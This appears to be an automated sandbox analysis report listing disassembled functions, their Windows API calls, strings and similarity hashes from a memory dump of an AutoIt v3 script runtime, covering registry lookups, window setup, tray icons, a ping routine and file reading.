API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5ca62fefb473a547c0f910838e23eb08e37ceb4be241aa4d0b9d5a2bb28241f0
Instruction ID: 8a223e6cd2e6732b0d811674d726a33bc2875db3dab2a57f5f9b1ab5ffec8757
Opcode Fuzzy Hash: 5ca62fefb473a547c0f910838e23eb08e37ceb4be241aa4d0b9d5a2bb28241f0
Instruction Fuzzy Hash: AA21C5B1904219AFDB409FA4EC89B9DBBF4FB08710F10421AF915B62A0D7B25548CF95

Function 00C02FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C100CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00C03094), ref: 00C100ED

Part of subcall function 00C108C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C0309F), ref: 00C108E3

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C030E2
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C401BA
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C401FB
RegCloseKey.ADVAPI32(?), ref: 00C40239
_wcscat.LIBCMT ref: 00C40292

Strings

Software\AutoIt v3\AutoIt, xrefs: 00C030D8
Include, xrefs: 00C401B1, 00C401F2
\, xrefs: 00C402B5
\Include\, xrefs: 00C0309F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: c2065ff61a8a632d3d6078956ec7f0cc747e1ac26c0844bb290ddb913813e202
Instruction ID: a097779e4c52d97f44e62409c0958b9dcbd946f1b37ace8d2c64db1c76a026de
Opcode Fuzzy Hash: c2065ff61a8a632d3d6078956ec7f0cc747e1ac26c0844bb290ddb913813e202
Instruction Fuzzy Hash: E37178B15093019EC714EF65EC85AAFBBECFF49340F50062EF945822A1EF709A48DB56

Function 00C0514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00C05156
LoadCursorW.USER32(00000000,00007F00), ref: 00C05165
LoadIconW.USER32(00000063), ref: 00C0517C
LoadIconW.USER32(000000A4), ref: 00C0518E
LoadIconW.USER32(000000A2), ref: 00C051A0
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C051C6
RegisterClassExW.USER32(?), ref: 00C0521C

Part of subcall function 00BF3411: GetSysColorBrush.USER32(0000000F), ref: 00BF3444
Part of subcall function 00BF3411: RegisterClassExW.USER32(00000030), ref: 00BF346E
Part of subcall function 00BF3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BF347F
Part of subcall function 00BF3411: InitCommonControlsEx.COMCTL32(?), ref: 00BF349C
Part of subcall function 00BF3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BF34AC
Part of subcall function 00BF3411: LoadIconW.USER32(000000A9), ref: 00BF34C2
Part of subcall function 00BF3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BF34D1

Strings

#, xrefs: 00C05201
AutoIt v3, xrefs: 00C0520B
0, xrefs: 00C051FA

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: cc0c410b151a6c2cd2c2a6987e4fa173bddeeb924f203dac1705bc1850380ed3
Instruction ID: 0f23c531f2e37769a3012c5393ca0ec4691b805c0ecee7ad95163a17f097c76d
Opcode Fuzzy Hash: cc0c410b151a6c2cd2c2a6987e4fa173bddeeb924f203dac1705bc1850380ed3
Instruction Fuzzy Hash: 902146B1904308EFEB119FA4ED09B9E7BB4FB58710F10035AFA04A62A0D7B65A54CF85

Function 00C65E1D Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 00C65E7E
inet_addr.WSOCK32(?,?,?), ref: 00C65EC3
gethostbyname.WS2_32(?), ref: 00C65ECF
IcmpCreateFile.IPHLPAPI ref: 00C65EDD
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C65F4D
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C65F63
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C65FD8
WSACleanup.WSOCK32 ref: 00C65FDE

Strings

Ping, xrefs: 00C65F01

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 4a4a57305aeebddcf3386b07159cc6737fce0dc855227f3d7b681b5440bb7e61
Instruction ID: 4610ba9f2adbd8408a588800f6e051ebb4de8c1eda443db8d0fa33cbd05a85ed
Opcode Fuzzy Hash: 4a4a57305aeebddcf3386b07159cc6737fce0dc855227f3d7b681b5440bb7e61
Instruction Fuzzy Hash: AB515F316046019FD721EF65CC89B2EB7E4EF48720F244569FAA6DB2A1DB70ED04DB42

Function 00C04D83 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00C04E22
KillTimer.USER32(?,00000001), ref: 00C04E4C
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C04E6F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C04E7A
CreatePopupMenu.USER32 ref: 00C04E8E
PostQuitMessage.USER32(00000000), ref: 00C04EAF

Strings

TaskbarCreated, xrefs: 00C04E75

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: 62acffb46fd40bb6cbe7455460cd9653099b5122ab4149947772cb63cf84ce37
Instruction ID: bbe17d20d0f8666b029a97ce263cef8bc212b1b2de1525ef29eed2d1c09529ac
Opcode Fuzzy Hash: 62acffb46fd40bb6cbe7455460cd9653099b5122ab4149947772cb63cf84ce37
Instruction Fuzzy Hash: 14411AB124820AEBDF195F24DC09B7FB699FB90301F140725FF21922E2CA719D54E766

Function 00C056F8 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C40C5B

Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B

_memset.LIBCMT ref: 00C05787
_wcscpy.LIBCMT ref: 00C057DB
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C057EB
__swprintf.LIBCMT ref: 00C40CD1

Strings

E#E#, xrefs: 00C40C95, 00C40C9E, 00C40CA9, 00C40CB7, 00C40CA2, 00C40CAD
AutoIt - , xrefs: 00C05760
Line %d: , xrefs: 00C40CCB

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
String ID: Line %d: $AutoIt - $E#E#
API String ID: 230667853-1317277412
Opcode ID: 06d317a076481fa1f97b09c925c266c9d82690e8721dabcd183febd89f296aed
Instruction ID: b416cf1417d055b94dac2939def42c617aca37613f8687ad7b43a29a3566ab64
Opcode Fuzzy Hash: 06d317a076481fa1f97b09c925c266c9d82690e8721dabcd183febd89f296aed
Instruction Fuzzy Hash: 57419271408305AED321EB64DC85BDFB7DCAF84354F140A1AF995920E2EB70A648DB97

Function 00C050DB Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C05109
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C0512A
ShowWindow.USER32(00000000), ref: 00C0513E
ShowWindow.USER32(00000000), ref: 00C05147

Strings

edit, xrefs: 00C05124
AutoIt v3, xrefs: 00C05101, 00C05106, 00C05107

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 0130f385af6753bacbe81554ec9d9f60283beecf17615c3e8e76069cb373c4d7
Instruction ID: f521d034982571521d1b6863ab28fd510fcaf48cf12fdc25dedfd5e6ab9d3f7f
Opcode Fuzzy Hash: 0130f385af6753bacbe81554ec9d9f60283beecf17615c3e8e76069cb373c4d7
Instruction Fuzzy Hash: 55F03470644290BEEA311B23AC08F2B2E7DE7C6F20F11032EBD00A22B0C6651840DAB5

Function 00C59B16 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C04A8C: _fseek.LIBCMT ref: 00C04AA4

Part of subcall function 00C59CF1: _wcscmp.LIBCMT ref: 00C59DE1
Part of subcall function 00C59CF1: _wcscmp.LIBCMT ref: 00C59DF4

_free.LIBCMT ref: 00C59C5F
_free.LIBCMT ref: 00C59C66
_free.LIBCMT ref: 00C59CD1

Part of subcall function 00C12F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00C19C54,00000000,00C18D5D,00C159C3), ref: 00C12F99
Part of subcall function 00C12F85: GetLastError.KERNEL32(00000000,?,00C19C54,00000000,00C18D5D,00C159C3), ref: 00C12FAB

_free.LIBCMT ref: 00C59CD9

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00C59B8F

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: b19bd0e6e1b4a51bbf634ab92d969d2695feaec0836d5250604bce35baec8fbd
Instruction ID: 4c101137efb4760663a04da9febea87fe802debf30270c908e4716fb4edb6bf7
Opcode Fuzzy Hash: b19bd0e6e1b4a51bbf634ab92d969d2695feaec0836d5250604bce35baec8fbd
Instruction Fuzzy Hash: 5A515DB5A04219AFDF24DF64DC45A9EBBB9FF48304F00009EB649A3281DB715A94DF58

Function 00C1563D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00C1569B
_memcpy_s.LIBCMT ref: 00C1570D
__read_nolock.LIBCMT ref: 00C1576B
__filbuf.LIBCMT ref: 00C1578E
_memset.LIBCMT ref: 00C157D2

Part of subcall function 00C18D58: __getptd_noexit.LIBCMT ref: 00C18D58

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction ID: d837d04532001d8d8ff9de177a66ce9afe8b89dd565c0dc37606abcbe5838601
Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
Instruction Fuzzy Hash: 9851A530A10B05DFDB249F69D8856EE77B5AF82320F248769F835962D0D7709ED1BB80

Function 00BF52B0 Relevance: 7.6, APIs: 5, Instructions: 99
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BF52E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BF534A
TranslateMessage.USER32(?), ref: 00BF5356
DispatchMessageW.USER32(?), ref: 00BF5360

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: ddb3da209e8b2eb8d1c108a9e84eeab35110401030f4346a27b0b93c17ae67c3
Instruction ID: 4a81af5a212883d32e87f59833570ce3f282a8df6cb194dd5b578614649ffe92
Opcode Fuzzy Hash: ddb3da209e8b2eb8d1c108a9e84eeab35110401030f4346a27b0b93c17ae67c3
Instruction Fuzzy Hash: 3631063090870A9BEB308BACDC84FB977E89B51344F2402D9EB23975D0D7B1998DD729

Function 00BF1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BF1275,SwapMouseButtons,00000004,?), ref: 00BF12A8
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BF1275,SwapMouseButtons,00000004,?), ref: 00BF12C9
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00BF1275,SwapMouseButtons,00000004,?), ref: 00BF12EB

Strings

Control Panel\Mouse, xrefs: 00BF12A6

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: e7eff6a40b4b3e1e54a57a7eeef4745e03b1cd25a9c6c000db0dd7fb76bc2e4b
Instruction ID: efc9c5961044283a0fb27e9368557a9342320cfc6734db4217193f87840c612a
Opcode Fuzzy Hash: e7eff6a40b4b3e1e54a57a7eeef4745e03b1cd25a9c6c000db0dd7fb76bc2e4b
Instruction Fuzzy Hash: 1A11187561020CFFDB208FA9DC84ABEBBECEF05745F104999E905D7110D7719E4897A4

Function 00C53F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00C82C4C), ref: 00C53F57
GetLastError.KERNEL32 ref: 00C53F66
CreateDirectoryW.KERNEL32(?,00000000), ref: 00C53F75
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C82C4C), ref: 00C53FD2

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 328b8c46060b10f21c494c6c8ddbea08de3bfa733eba66dfae3b8001beae0f02
Instruction ID: 2485f6a1331ab3f807c26420fc766235cb674eab058e3adb1e4501d6080448b0
Opcode Fuzzy Hash: 328b8c46060b10f21c494c6c8ddbea08de3bfa733eba66dfae3b8001beae0f02
Instruction Fuzzy Hash: 9921AD749082019FC300DF68C88596EB7F4AE593A5F104B5DFCA4C72E1D730DA8ACB4A

Function 00C05B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C05B58

Part of subcall function 00C056F8: _memset.LIBCMT ref: 00C05787
Part of subcall function 00C056F8: _wcscpy.LIBCMT ref: 00C057DB
Part of subcall function 00C056F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C057EB

KillTimer.USER32(?,00000001,?,?), ref: 00C05BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C05BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C40D7C

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 7655d9728ec6b41791cb1881c53dbf49a465dca0f9114c75c452a379b1c82221
Instruction ID: b56172ee213f23d7a9e3891a3e8cfcbfff189af60ab7df1fe10dff11f7356deb
Opcode Fuzzy Hash: 7655d9728ec6b41791cb1881c53dbf49a465dca0f9114c75c452a379b1c82221
Instruction Fuzzy Hash: 8121F670944784AFE7728B64C895FEBBFECAF01308F14049DE7AA56281C3743A88DB51

Function 00C0278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00C049C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C027AF,?,00000001), ref: 00C049F4

_free.LIBCMT ref: 00C3FB04
_free.LIBCMT ref: 00C3FB4B

Part of subcall function 00C029BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C02ADF

Strings

Bad directive syntax error, xrefs: 00C3FB33

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 8561d2b2a44ea80c26c3e7ce1ea5e99a9d5c8f0f6506baf70343c61acabc1ed5
Instruction ID: bda6288d731d862215a436c53186849ee41b50e512b195a398fb353153db2464
Opcode Fuzzy Hash: 8561d2b2a44ea80c26c3e7ce1ea5e99a9d5c8f0f6506baf70343c61acabc1ed5
Instruction Fuzzy Hash: B7917E71D10219AFCF04EFA4C8919EEB7B4FF09314F14496AF815AB2A1DB309A46EB50

Function 00C59CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00C04AB2: __fread_nolock.LIBCMT ref: 00C04AD0

_wcscmp.LIBCMT ref: 00C59DE1
_wcscmp.LIBCMT ref: 00C59DF4

Strings

FILE, xrefs: 00C59D2D

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 796f3b9c60bfced83f5d7d7e9c746af793180029a265743d9153d2104f49c962
Instruction ID: c04852920bc92dccd38258862fe50db9fe3bd5b8e00e3e375883684bd627f805
Opcode Fuzzy Hash: 796f3b9c60bfced83f5d7d7e9c746af793180029a265743d9153d2104f49c962
Instruction Fuzzy Hash: 3F41F875A40209BADF20DAA4CC46FEF77BDDF45710F0004AAFA00A71C1DA719A48EBA4

Function 00C031BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C4032B
GetOpenFileNameW.COMDLG32(?), ref: 00C40375

Part of subcall function 00C10284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C02A58,?,00008000), ref: 00C102A4

Part of subcall function 00C109C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00C109E4

Strings

X, xrefs: 00C40343

Memory Dump Source

Source File: 00000020.00000002.4143391839.0000000000BF1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000020.00000002.4143336470.0000000000BF0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000C80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143539610.0000000000CA6000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143661239.0000000000CB0000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4143718920.0000000000CB9000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_bf0000_Carter.jbxd

Similarity

